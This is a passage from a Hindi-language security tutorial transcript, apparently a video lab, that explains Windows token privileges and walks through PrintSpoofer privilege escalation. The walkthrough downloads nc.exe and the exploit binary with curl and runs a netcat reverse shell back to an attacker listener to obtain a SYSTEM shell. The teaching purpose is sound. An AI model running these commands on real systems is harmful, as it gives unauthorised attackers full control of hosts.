है कि इन टोकन को पढ़ने के लिए आपको लगती है वनरेबिलिटीज, ठीक है। तो अब आपको समझ आएगा कि काफी लोगों को लगता है कि ये प्रिविलेज होने से आप प्रिविलेज एस्केलेशन कर सकते हो। ये ट्रू नहीं है, बिल्कुल भी ट्रू नहीं है। ये बिल्कुल गलत है कि ये प्रिविलेजेस होने से आप प्रिविलेज एस्केलेशन कर सकते हो। अब यहाँ पे मैंने क्या बोला कि आपको सबसे पहले दूसरे यूजर का टोकन निकालना पड़ेगा, फिर आप इन प्रिविलेज की मदद से उन टोकन को यूज करके एक नए प्रोसेस को स्टार्ट कर सकते हो। लेकिन वो टोकन, दूसरे यूजर का टोकन पढ़ोगे कैसे, मतलब मैं ये आपको कह रहा हूँ, सोचो वेबसाइट के हिसाब से सोचो कि मैं आपको ये बोल रहा हूँ कि आपको अगर एक बार दूसरे यूजर की कुकी मिल गई, तो आप उसका अकाउंट डिलीट मार सकते हो। आप कहोगे तो मुझे भी पता है, इसमें नया क्या है। मेन बात है कि मेरे को दूसरे यूजर की कुकी मिलेगी कैसे, वही यहाँ पे भी क्वेश्चन है। कि यहाँ पे ये कह रहे हैं कि आपको दूसरे यूजर का टोकन मिल जाएगा, तो उस टोकन की मदद से मैं नए प्रोसेसेस को रन कर सकता हूँ। लेकिन मेन क्वेश्चन वो है कि दूसरे यूजर का टोकन मिलेगा कैसे। उसके लिए हमारे को लगती है वनरेबिलिटीज। तो अनटिल एंड अनलेस कोई वनरेबिलिटी हो, तब तक हम इसको एक्सप्लॉइट नहीं कर सकते। जैसे अदर जितने भी थे, सी रिस्टोर, बैकअप, टेक ओनरशिप, उनमें वनरेबिलिटी की जरूरत नहीं है, क्योंकि वो फंक्शनैलिटी है। यहाँ पे एक वनरेबिलिटी चाहिए जिनसे हम इन टोकन्स को पढ़ पाएं।
टोकन्स को पढ़ने के बाद हम फिर इनकी मदद से एक्सप्लॉइटेशन कर सकते हैं। और वो वल्नरेबिलिटीज़ होती कैसे हैं, आपने नाम भी सुना होगा, एक वल्नरेबिलिटी होती है प्रिंट स्पूफर, ठीक है? तो वो बेसिकली कुछ नहीं करती थी, प्रिंट स्पूफर एक वल्नरेबिलिटी थी जो spooler.exe की मदद से, spooler.exe में उन्होंने एक वल्नरेबिलिटी निकाली जिसकी मदद से वो दूसरे यूजर्स के टोकन्स को देख पा रहे थे, ठीक है? जैसे एंटी अथॉरिटी यूजर के टोकन को देख पा रहे थे, फिर वो उनके टोकन को निकाल लाते थे और फिर जिस पे भी ये प्रिविलेज होता था वो सीधा एंटी अथॉरिटी सिस्टम बन जाता था। ये कॉन्सेप्ट होता था। आपने प्रिंट स्पूफर वल्नरेबिलिटी पूरी समझ ली कि प्रिंट स्पूफर वल्नरेबिलिटी में spooler.exe के अंदर उन्होंने एक वल्नरेबिलिटी ढूंढी जिससे वो टोकन्स को निकाल लेते। मेन यहाँ पे बात होती है टोकन निकालना, दूसरे यूजर की कुकी निकालना। उसकी मदद से उन्होंने कुकी निकाल ली दूसरे यूजर की, आप कुकी मिल गई, उसके बाद आपके पास ये प्रिविलेज अगर होंगे, ये वाला या फिर ये वाला, तो आप क्या काम कर पाओगे, उन टोकन्स की मदद से एक नए प्रोसेस को रन कर पाओगे। प्रोसेस कुछ भी हो सकता है, नेटकैट को रन कर लो, रिवर्स शेल को रन कर लो, कुछ भी आप उसकी मदद से कर पाओगे। आई होप सो ये क्लियर हो गया। तो अब हम इसको प्रैक्टिस में करके देखते हैं कि होने कैसे वाला है, ठीक है? अब वहाँ पे ये प्रिविलेज है, तो यहाँ पे हम प्रिंट स्पूफर का यूज़ लेने वाले। प्रिंट स्पूफर की मदद से हम क्या काम करेंगे, एक दूसरे यूज़र का टोकन पढ़ लेंगे, उस टोकन की मदद से हम फिर एक नया प्रोसेस स्टार्ट करेंगे। और वो टोकन हम किसका पढ़ने वाले, एंटी अथॉरिटी सिस्टम का। जैसे मैंने बताया हर यूज़र को एक टोकन मिलता है, हर लॉग्ड इन यूज़र को, याद रखना। ऐसा नहीं कि इस सिस्टम पे अगर मान लो 10 यूज़र्स है तो सबके अपने अपने टोकन होंगे। जो भी लॉग्ड इन यूजर होता है उसको टोकन मिलता है, मतलब कुकी भी उसी को मिलती है ना। मान लो मैं लॉग इन हूँ तो मेरे को कुकी मिलेगी, ऐसा थोड़ा है कि एक यूजर कभी दुनिया में उसने 10 साल पहले रजिस्टर करा था उस साइट पे, उसकी कुकी अभी तक एक्टिव रहेगी, ऐसा नहीं। तो जो उस समय लॉग इन है सिर्फ उसका टोकन होता है, लेकिन एंटी अथॉरिटी सिस्टम का टोकन हमेशा रहता है, क्योंकि वो यूजर तो बूट होते ही बन जाता है ना। मतलब एंटी अथॉरिटी यूजर आप कह सकते हो, वो स्टार्ट होते ही एंटी अथॉरिटी सिस्टम के प्रिविलेज के साथ बहुत सारी सर्विसेज को रन होना होता है, प्रोसेसेस को रन होना होता है, तो उसका टोकन तो बहुत स्टार्टिंग में बन जाता है। तो हमेशा हर सिस्टम पे एंटी अथॉरिटी सिस्टम का टोकन रहता है, आपको बस उसको चुराना है और आपके ये प्रिविलेज होने चाहिए और आप एंटी अथॉरिटी सिस्टम बन जाओगे, ठीक है? तो अब उसको चुराते हैं यहाँ पे सबसे पहले, तो उसके लिए मैं प्रिंट स्पूफर का यूज़ लूँगा। तो मेरे को प्रिंट स्पूफर.exe को इधर ट्रांसफर करना है, तो उसके लिए मैं यहाँ पे क्या काम करूँगा, तो मैं यहाँ पे कर्ल का यूज़ ले लूँगा इस बार। कर्ल का HTTP 192.168 और 179.176 nc.exe, और इसको हम सेव कर लेंगे सी के अंदर, यूज़र्स के अंदर। एक आपको एक टिप दे रहा हूँ कि कहाँ पे आप ऐसे रख सकते हो जो वहाँ से आप सब एक्सेस कर पाओ। तो आप इसको सी यूज़र्स पब्लिक का फोल्डर रहता है, पब्लिक के अंदर डाल दो, वहाँ से आप एक्सेस कर पाओगे इसको, ठीक है? तो आप टेम्प्रेरी फोल्डर में भी डाल सकते हो। यहाँ पे nc.exe देते हैं, nc.exe, और शायद डैश ओ का ऑप्शन देना पड़ता है कर्ल के साथ, तो इसको कॉपी कर लेता हूँ और वापस चलते हैं अपने सिस्टम पे एक बार काली पे, वहाँ पे सर्वर स्टार्ट कर देता हूँ मैं पहले। और यहाँ पे आगे मैं करूँगा ls, यहाँ पे हमारे पे नेटकेट पड़ी है तो python 3-m http.server 80, ठीक है? वापस चलते हैं। अब यहाँ पे हमने ये कर दिए, ठीक है? इसको रन करते हैं, शायद हो गया होगा, देखते हैं एक बार। del c users public और nc.exe हमारी आ गई, ठीक है? तो nc को हमने डाउनलोड कर लिया। अब मैं सेम कमांड की मदद से यहाँ पे एक और चीज़ डाउनलोड करूँगा जो कि है प्रिंट स्पूफर की exe फाइल, ठीक है? तो उसको पहले डाउनलोड कर लेते हैं। तो यहाँ पे प्रिंट स्पूफर, यहाँ चलते हैं, इसको खोल लेते हैं पहले वाले लिंक को। और यहाँ आने के बाद मैं क्या काम करूँगा, रिलीजेस के अंदर जाऊँगा और रिलीजेस में मेरे को मिल जाएगी इसकी 64 बिट वाली exe, इसको डाउनलोड कर लेंगे लोकल सिस्टम पे। ये डाउनलोड हो गई हमारी। वापस अपने काली के टर्मिनल पे चलते हैं, यहाँ पे आते हैं, मूव कर लेते हैं डाउनलोड से उसको, प्रिंट spoofer.exe को यहाँ पे ps.exe के नाम से, सबसे ईजी यही रहेगा। पाइथन का सर्वर दोबारा स्टार्ट करते हैं, वापस से चलते हैं ब्राउज़र के अंदर। अब यहाँ पे आने के बाद मैं यहाँ पे ps.exe जो है प्रिंट स्पूफर की फाइल, ठीक है, इसको डाउनलोड कर लेंगे। सब कुछ सही लग रहा है, रन करते हैं और ये भी हमारी डाउनलोड हो गई, ठीक है? अब प्रिंट स्पूफर मैंने आपको बताया था, प्रिंट स्पूफर एक वनरेबिलिटी थी, फाइंड हुई थी, जो बेसिकली वनरेबिलिटी का नाम था प्रिंट स्पूफर। वो कुछ नहीं करती थी, spooler.exe के अंदर एक वनरेबिलिटी थी जिसकी मदद से वो टोकन्स को पढ़ पाती थी। और टोकन्स को पढ़ने के बाद अगर आपके यूज़र के साथ सी इम्पर्सोनेट या प्राइमरी टोकन का प्रिविलेज होता था तो वो फिर उन टोकन को रिप्ले करके आपको CMD या कोई भी प्रोसेस जो भी आप रन करना चाहते हो वो रन करके दे देती थी, ठीक है? तो वही हम यहाँ पे करने वाले हैं। तो यहाँ पे मैं क्या दूंगा, सी यूज़र्स, जैसे ये था तो इसकी जगह मैं ps.exe कर दूंगा, ps.exe, ठीक है? अब इसको यूज़ करना बहुत सिंपल है।
आपको यहाँ पे क्या लिखना है, -C ऑप्शन। जो भी कमांड आपको इसके साथ रन करना है वो आप कर सकते हो। बाकी ये काम खुद से कर देगी, टोकन को निकालना, टोकन को पढ़ना, उसके बाद उससे एक नया प्रोसेस स्टार्ट करना, वो सभी खुद कर देगी। और मैं क्या करने वाला हूँ इसको मैं बोलूँगा कि ये कॉपी करते हैं, इसको मैं बोलूँगा कि एक कमांड रन कर दो मेरे लिए। वो कमांड क्या होने वाला है, netcat.exe को रन कर दो, nc.exe को रन कर दो, और उसमें ऑप्शन दे देंगे -cmd.exe, ठीक है, cmd.exe, और 192 अपने आईपी पे उसको रिवर्शियल ले रहा हूँ बेसिकली, 192.168.176 और पोर्ट 4445 पे कर लेते हैं, ठीक है। वापस चलते हैं अपने पहले काली पे और वहाँ पे एक लिसनर स्टार्ट कर लेते हैं। यहाँ पे मैं आऊँगा nc-nvlp 4445, एंटर मारते हैं, वापस चलते हैं। अब यहाँ आने के बाद मैं इसको रन करूँगा, शायद से शेल आ गया होगा, मुझे लग नहीं रहा, क्योंकि अगर शेल आता तो शायद ही अटक जाता, पर देखते हैं एक बार। और शेल नहीं आया तो मैंने कुछ गड़बड़ कर दी है, देखते हैं क्या गड़बड़ करी है। और मुझे पता है मैंने गड़बड़ क्या करी। यहाँ पे पब्लिक आना था, यूज़र ही गलत दिया है, पहले तो मैंने पब्लिक आना था यहाँ पे, सी यूज़र्स पब्लिक के अंदर ये फाइल पड़ी है, और यहाँ पे भी सेम ये सी यूज़र्स पब्लिक के अंदर ये फाइल पड़ी है, तो वो मेरी गलती है, पाथ गलत दे दिया था मैंने। तो अब हम प्रिंट स्पूफर वाली फाइल को कह रहे हैं कि ये कमांड रन कर दो। कमांड क्या है हमारा, nc.exe -cmd.exe और उसके बाद 192 और इस पोर्ट पे हमारे को शेल दे दो, और रन करते हैं एंड डन हो गया। देखो ये क्या कह रहा है, फाउंड प्रिविलेज, ये वाला प्रिविलेज इसको मिल गया, SC इम्पर्सोनेंट प्रिविलेज। नेम पाइप लिस्टिंग, बेसिकली एक सर्वर सेटअप कर रहा है जिसपे ये टोकन रिसीव करेगा, आप ऐसे मान सकते हो। और क्रिएट प्रोसेस एज यूज़र, इसने प्रोसेस क्रिएट कर दिया है, इसको टोकन मिल गया एंटी अथॉरिटी सिस्टम का, टोकन मिल गया, इसने नया प्रोसेस उस टोकन के साथ स्टार्ट कर दिया। वो प्रोसेस क्या है, ये प्रोसेस जो हमने कमांड दिया था, और हमारे को एंटी अथॉरिटी सिस्टम का शेल मिल गया होगा। एंड आपको दिखेगा यहाँ पे शेल आ चुका है, हु एम आई एंड वी आर एंटी अथॉरिटी सिस्टम। तो अब आपको समझ आ गया ये वल्नरेबिलिटी इतनी कॉम्प्लेक्स नहीं होती, एक बार आप समझोगे। आपने सोचो प्रिंट स्पूफर जब आया था तो इसने काफ़ी हल्ला मचाया था मार्केट में, बट इट इज़ नॉट दैट इनसेन, बस समझने की देर है इन वल्नरेबिलिटीज़ को। आई होप सो आपको यूज़र प्रिविलेजेस समझ आए हो, इंटरेस्टिंग लगा हो, कुछ नया सीखने को मिला होगा इसमें। तो आई होप सो आपको ये वीडियो पसंद आई हो, आपके सारे डाउट्स इस टॉपिक से रिलेटेड सॉल्व हो गए हो। तो प्लीज़ लाइक द वीडियो, सब्सक्राइब द चैनल, थैंक यू एंड गुड बाय।